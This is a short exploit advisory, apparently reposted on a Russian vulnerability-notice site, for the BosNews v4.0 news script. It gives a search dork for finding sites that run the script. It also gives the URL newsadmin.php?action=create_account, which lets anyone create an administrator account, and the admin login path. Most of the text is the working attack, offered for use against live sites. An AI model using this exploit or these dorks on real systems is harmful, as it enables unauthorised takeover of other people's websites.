Уведомление о безопасности: BosNews v4.0 Remote add user admin

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  BosNews 2002-2006 Remote add user admin
  Dotclear 'ecrire/images.
php' Arbitrary File Upload Vulnerability
  KwsPHP (Upload) Remote Code Execution Exploit
  S21SEC-041-en:
Cezanne SW Cross-Site Scripting

From: houssamix_(at)_hotmail.fr <houssamix_(at)_hotmail.fr>
Date: 15 апреля 2008 г.
Subject: BosNews v4.0 Remote add user admin

---------------------------------------------------------------------------------
-----------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
---------------------------------------------------------
---------------------------------------------------------------------------------
-----------------------------

= Author : HouSSaMix
= Script : BosNews
= version : 4.0
= Download : http://www.bosdev.com/

= Dork : Powered by BosNews


= BUG : Remote add user admin

exploit => Target.com/path/newsadmin.php?action=create_account

here u can add a new user admin

= admin login

Target.com/path/newsadmin.php